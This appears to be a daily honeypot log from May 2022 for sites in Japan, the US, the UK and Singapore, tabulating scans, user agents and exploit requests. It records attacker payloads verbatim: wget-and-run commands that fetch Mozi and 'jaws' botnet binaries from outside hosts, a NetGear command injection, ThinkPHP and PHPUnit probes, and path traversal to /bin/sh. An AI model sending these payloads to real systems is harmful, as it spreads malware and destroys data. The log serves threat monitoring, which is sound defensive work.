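Honeypot (tentative) observation log for 2022/05/10.
Characteristics
Common to all locations:
Access targeting a GPON router vulnerability
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting a ThinkPHP vulnerability
Scanning by zgrab
Scanning for /.aws
Scanning for /.env
Scanning for Apache Solr
Scanning for Apache Tomcat
Location:JP
The following were observed:
Access targeting vulnerabilities in D-Link products
Scanning for /.git
Access with the User-Agent "Hello, world"
The following access to /shell was observed: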
cd /tmp; rm -rf *; wget jx.qingdaosheng.com/jaws; sh /tmp/jaws
Location:US
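The following were observed:
Access targeting the Apache HTTP Server vulnerability (CVE-2021-41773)
Access targeting vulnerabilities in D-Link products
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting the Spring Cloud Gateway vulnerability (CVE-2022-22947)
Scanning by aiohttp
Scanning for Laravel
Malicious traffic involving 5.188.210.227
Malicious traffic involving 85.206.160.115
Access with the User-Agent "Hello, world"
The following access to /shell was observed: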
cd /tmp; rm -rf *; wget http://210.89.39.104:57591/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:UK
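The following were observed:
Access targeting the Apache HTTP Server vulnerability (CVE-2021-41773)
Access targeting vulnerabilities in D-Link products
Access targeting a JBoss vulnerability
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting vulnerabilities in NetGear products
Access targeting a Spring Boot vulnerability
Access targeting the Spring Cloud Gateway vulnerability (CVE-2022-22947)
Scanning for Laravel
Scanning for WordPress
Access with the User-Agent "Hello, world"
The following access to /shell was observed: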
cd /tmp; rm -rf *; wget jx.qingdaosheng.com/jaws; sh /tmp/jaws
Location:SG
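The following were observed:
Access targeting the Apache HTTP Server vulnerability (CVE-2021-41773)
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting the Spring Cloud Gateway vulnerability (CVE-2022-22947)
Scanning for /.git
Scanning for Laravel
Malicious traffic involving 85.206.160.115
Access with the User-Agent "Hello, world"
The following access to /shell was observed: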
cd /tmp; rm -rf *; wget a.tigoinari.tk/arm7; sh /tmp/arm7
cd /tmp; rm -rf *; wget cnc.krakenbit.net/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget 209.141.59.94/jaws; sh /tmp/jaws
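Other
Access count trend
JP: total accesses: 222 (change from previous day: 158)
US: total accesses: 71 (change from previous day: -95)
UK: total accesses: 49 (change from previous day: -231)
SG: total accesses: 76 (change from previous day: -347)
For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.
Location:JP
Source IP addresses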
User-Agent list
Count | UserAgent |
---|---|
10 | - |
1 | 0xAbyssalDoesntExist |
1 | Hello, world |
1 | Mozila/5.0 |
1 | Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 |
150 | Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
40 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) |
2 | Mozilla/5.0 zgrab/0.x |
1 | Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10 |
2 | python-requests/2.22.0 |
1 | python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.59.1.el7.x86_64 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
3 | \x03 | | |
1 | \x16\x03\x01\x01D\x01 | | |
1 | \x16\x03\x01\x02 | | |
2 | \x16\x03\x01 | | |
1 | GET | /.aws/credentials | HTTP/1.1 |
39 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
1 | GET | //.aws/credentials/phpinfo | HTTP/1.1 |
1 | GET | //.env.1 | HTTP/1.1 |
1 | GET | //.env.bak | HTTP/1.1 |
1 | GET | //.env.example.1 | HTTP/1.1 |
1 | GET | //.env.example.suspected | HTTP/1.1 |
1 | GET | //.env.example | HTTP/1.1 |
1 | GET | //.env.suspected | HTTP/1.1 |
1 | GET | //.env.txt | HTTP/1.1 |
1 | GET | //.env_bak | HTTP/1.1 |
1 | GET | //.env_old | HTTP/1.1 |
1 | GET | //.env | HTTP/1.1 |
1 | GET | //.env~ | HTTP/1.1 |
1 | GET | ///.env | HTTP/1.1 |
1 | GET | //api/.env.example | HTTP/1.1 |
1 | GET | //api/.env | HTTP/1.1 |
2 | GET | //app/.env.example | HTTP/1.1 |
2 | GET | //app/.env | HTTP/1.1 |
1 | GET | //app/frontend/.env.example | HTTP/1.1 |
1 | GET | //app/frontend/.env | HTTP/1.1 |
1 | GET | //application/.env.example | HTTP/1.1 |
1 | GET | //application/.env | HTTP/1.1 |
1 | GET | //aws[.]yml | HTTP/1.1 |
1 | GET | //awstats/.env.example | HTTP/1.1 |
1 | GET | //awstats/.env | HTTP/1.1 |
1 | GET | //back-end/app/.env.example | HTTP/1.1 |
1 | GET | //back-end/app/.env | HTTP/1.1 |
1 | GET | //backend/.env.example | HTTP/1.1 |
1 | GET | //backend/.env | HTTP/1.1 |
1 | GET | //backup/.env.example | HTTP/1.1 |
1 | GET | //backup/.env | HTTP/1.1 |
1 | GET | //bootstrap/.env.example | HTTP/1.1 |
1 | GET | //bootstrap/.env | HTTP/1.1 |
1 | GET | //build/.env.example | HTTP/1.1 |
1 | GET | //build/.env | HTTP/1.1 |
1 | GET | //config/.env.example | HTTP/1.1 |
1 | GET | //config/.env | HTTP/1.1 |
1 | GET | //config/aws.yml | HTTP/1.1 |
2 | GET | //core/.env.example | HTTP/1.1 |
2 | GET | //core/.env | HTTP/1.1 |
1 | GET | //data/.env.example | HTTP/1.1 |
1 | GET | //data/.env | HTTP/1.1 |
1 | GET | //database/.env.example | HTTP/1.1 |
1 | GET | //database/.env | HTTP/1.1 |
1 | GET | //demo/.env.example | HTTP/1.1 |
1 | GET | //demo/.env | HTTP/1.1 |
1 | GET | //dev/.env.example | HTTP/1.1 |
1 | GET | //dev/.env | HTTP/1.1 |
1 | GET | //developer/.env.example | HTTP/1.1 |
1 | GET | //developer/.env | HTTP/1.1 |
1 | GET | //django_project_path/.env.example | HTTP/1.1 |
1 | GET | //django_project_path/.env | HTTP/1.1 |
1 | GET | //docker/.env.example | HTTP/1.1 |
1 | GET | //docker/.env | HTTP/1.1 |
1 | GET | //docs/.env.example | HTTP/1.1 |
1 | GET | //docs/.env | HTTP/1.1 |
2 | GET | //en/.env.example | HTTP/1.1 |
2 | GET | //en/.env | HTTP/1.1 |
1 | GET | //env/.env.example | HTTP/1.1 |
1 | GET | //env/.env | HTTP/1.1 |
1 | GET | //env[.]txt | HTTP/1.1 |
1 | GET | //environments/.env.example | HTTP/1.1 |
1 | GET | //environments/.env | HTTP/1.1 |
1 | GET | //example/.env.example | HTTP/1.1 |
1 | GET | //example/.env | HTTP/1.1 |
1 | GET | //examples/.env.example | HTTP/1.1 |
1 | GET | //examples/.env | HTTP/1.1 |
1 | GET | //front-app/.env.example | HTTP/1.1 |
1 | GET | //front-app/.env | HTTP/1.1 |
1 | GET | //front-empathy/.env.example | HTTP/1.1 |
1 | GET | //front-empathy/.env | HTTP/1.1 |
1 | GET | //front-end/.env.example | HTTP/1.1 |
1 | GET | //front-end/.env | HTTP/1.1 |
1 | GET | //front/.env.example | HTTP/1.1 |
1 | GET | //front/.env | HTTP/1.1 |
1 | GET | //frontend/.env.example | HTTP/1.1 |
1 | GET | //frontend/.env | HTTP/1.1 |
1 | GET | //info[.]php | HTTP/1.1 |
1 | GET | //js/.env.example | HTTP/1.1 |
1 | GET | //js/.env | HTTP/1.1 |
1 | GET | //laravel/.env.example | HTTP/1.1 |
1 | GET | //laravel/.env | HTTP/1.1 |
1 | GET | //local/.env.example | HTTP/1.1 |
1 | GET | //local/.env | HTTP/1.1 |
1 | GET | //log/.env.example | HTTP/1.1 |
1 | GET | //log/.env | HTTP/1.1 |
1 | GET | //mail/.env.example | HTTP/1.1 |
1 | GET | //mail/.env | HTTP/1.1 |
1 | GET | //phpinfo[.]php | HTTP/1.1 |
1 | GET | //prod/.env.example | HTTP/1.1 |
1 | GET | //prod/.env | HTTP/1.1 |
1 | GET | //production/.env.example | HTTP/1.1 |
1 | GET | //production/.env | HTTP/1.1 |
1 | GET | //project/.env.example | HTTP/1.1 |
1 | GET | //project/.env | HTTP/1.1 |
1 | GET | //pub/.env.example | HTTP/1.1 |
1 | GET | //pub/.env | HTTP/1.1 |
2 | GET | //public/.env.example | HTTP/1.1 |
2 | GET | //public/.env | HTTP/1.1 |
1 | GET | //rest/.env.example | HTTP/1.1 |
1 | GET | //rest/.env | HTTP/1.1 |
1 | GET | //route/.env.example | HTTP/1.1 |
1 | GET | //route/.env | HTTP/1.1 |
1 | GET | //src/.env.example | HTTP/1.1 |
1 | GET | //src/.env | HTTP/1.1 |
1 | GET | //stag/.env.example | HTTP/1.1 |
1 | GET | //stag/.env | HTTP/1.1 |
1 | GET | //staging/.env.example | HTTP/1.1 |
1 | GET | //staging/.env | HTTP/1.1 |
1 | GET | //staging2/.env.example | HTTP/1.1 |
2 | GET | //staging2/.env | HTTP/1.1 |
1 | GET | //static/.env.example | HTTP/1.1 |
1 | GET | //static/.env | HTTP/1.1 |
1 | GET | //stats/.env.example | HTTP/1.1 |
1 | GET | //stats/.env | HTTP/1.1 |
1 | GET | //storage/.env.example | HTTP/1.1 |
1 | GET | //storage/.env | HTTP/1.1 |
1 | GET | //system/.env.example | HTTP/1.1 |
1 | GET | //system/.env | HTTP/1.1 |
1 | GET | //temp/.env.example | HTTP/1.1 |
1 | GET | //temp/.env | HTTP/1.1 |
1 | GET | //test/.env.example | HTTP/1.1 |
1 | GET | //test/.env | HTTP/1.1 |
1 | GET | //tests/.env.example | HTTP/1.1 |
1 | GET | //tests/.env | HTTP/1.1 |
1 | GET | //thumb/.env.example | HTTP/1.1 |
1 | GET | //thumbs/.env.example | HTTP/1.1 |
1 | GET | //tmp/.env.example | HTTP/1.1 |
1 | GET | //tmp/.env | HTTP/1.1 |
1 | GET | //v1/.env.example | HTTP/1.1 |
1 | GET | //v1/.env | HTTP/1.1 |
1 | GET | //v2/.env.example | HTTP/1.1 |
1 | GET | //v2/.env | HTTP/1.1 |
2 | GET | //vendor/.env.example | HTTP/1.1 |
2 | GET | //vendor/.env | HTTP/1.1 |
1 | GET | //vendor/laravel/.env.example | HTTP/1.1 |
1 | GET | //vendor/laravel/.env | HTTP/1.1 |
2 | GET | //web/.env.example | HTTP/1.1 |
2 | GET | //web/.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /ab2g | HTTP/1.1 |
1 | GET | /ab2h | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 | HTTP/1.0 |
1 | GET | /config/getuser?index=0 | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /seeyon/index.jsp | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+jx[.]qingdaosheng[.]com/jaws;sh+/tmp/jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | http[:]//dyn[.]epicgifs[.]net/test6956.php | HTTP/1.1 |
1 | GET | http[:]//us[.]vansto[.]net/verify.txt | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.1 |
2 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /editBlackAndWhiteList | HTTP/1.1 |
Location:US
Source IP addresses
User-Agent list
Count | UserAgent |
---|---|
19 | - |
2 | Go-http-client/1.1 |
1 | Hello, world |
1 | Mozila/5.0 |
4 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
26 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
3 | Mozilla/5.0 zgrab/0.x |
1 | Python/3.7 aiohttp/3.7.4.post0 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
4 | - | | |
1 | MGLNDD_34.68.118.83_80\n | | |
3 | \x03 | | |
2 | \x16\x03\x01\x01D\x01 | | |
1 | \x16\x03\x01 | | |
1 | CONNECT | 85[.]206[.]160[.]115:80 | HTTP/1.1 |
1 | CONNECT | hotmail-com.olc[.]protection[.]outlook[.]com:25 | HTTP/1.1 |
1 | GET | /.aws/credentials | HTTP/1.1 |
28 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /ReportServer | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /ab2g | HTTP/1.1 |
1 | GET | /ab2h | HTTP/1.1 |
1 | GET | /actuator/gateway/routes | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin | HTTP/1.0 |
1 | GET | /config/getuser?index=0 | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//210[.]89[.]39[.]104:57591/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php | HTTP/1.1 |
2 | GET | http[:]//example[.]com/ | HTTP/1.1 |
3 | HEAD | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | PRI | * | HTTP/2.0 |
Location:UK
Source IP addresses
User-Agent list
Count | UserAgent |
---|---|
11 | - |
2 | Hello, world |
1 | Mozila/5.0 |
2 | Mozilla 5/0 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 |
1 | Mozilla/5.0 Gecko/20100101 |
3 | Mozilla/5.0 zgrab/0.x |
1 | python-requests/2.22.0 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_132.145.66.34_80\n | | |
1 | \x03 | | |
1 | \x16\x03\x01\x01D\x01 | | |
1 | \x16\x03\x01 | | |
1 | GET | /.aws/credentials | HTTP/1.1 |
2 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=rgjr7f98 | HTTP/1.1 |
1 | GET | /ReportServer | HTTP/1.1 |
2 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /actuator/env | HTTP/1.1 |
1 | GET | /actuator/gateway/routes | HTTP/1.1 |
2 | GET | /boaform/admin/formLogin?username=admin&psd=admin | HTTP/1.0 |
2 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp | HTTP/1.0 |
1 | GET | /boaform/admin/formLogin?username=user&psd=user | HTTP/1.0 |
1 | GET | /console/ | HTTP/1.1 |
3 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /invoker/readonly | HTTP/1.1 |
1 | GET | /jenkins/login | HTTP/1.1 |
1 | GET | /login | HTTP/1.1 |
3 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /script | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//27[.]43[.]202[.]170:50920/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 | HTTP/1.0 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+jx[.]qingdaosheng[.]com/jaws;sh+/tmp/jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /users/sign_in | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/phpunit.xml | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-login.php | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.1 |
1 | POST | /_ignition/execute-solution | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | PRI | * | HTTP/2.0 |
Location:SG
Source IP addresses
User-Agent list
Count | UserAgent |
---|---|
27 | - |
1 | Hello, world |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
5 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52 |
24 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 zgrab/0.x |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
5 | - | | |
4 | \x03 | | |
2 | \x16\x03\x01\x01D\x01 | | |
5 | \x16\x03\x01\x02 | | |
2 | \x16\x03\x01 | | |
1 | CONNECT | 85[.]206[.]160[.]115:80 | HTTP/1.1 |
1 | CONNECT | hotmail-com.olc[.]protection[.]outlook[.]com:25 | HTTP/1.1 |
1 | GET | /.aws/credentials | HTTP/1.1 |
23 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/HEAD | HTTP/1.1 |
1 | GET | /.well-known/security.txt | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /HNAP1 | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /actuator/gateway/routes | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin | HTTP/1.0 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /evox/about | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /nmaplowercheck1652115626 | HTTP/1.1 |
2 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/arm7;sh+/tmp/arm7 | |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ cnc.krakenbit.net/jaws;sh+/tmp/jaws | |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+209[.]141[.]59[.]94/jaws;sh+/tmp/jaws | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
2 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
1 | POST | /sdk | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | PRI | * | HTTP/2.0 |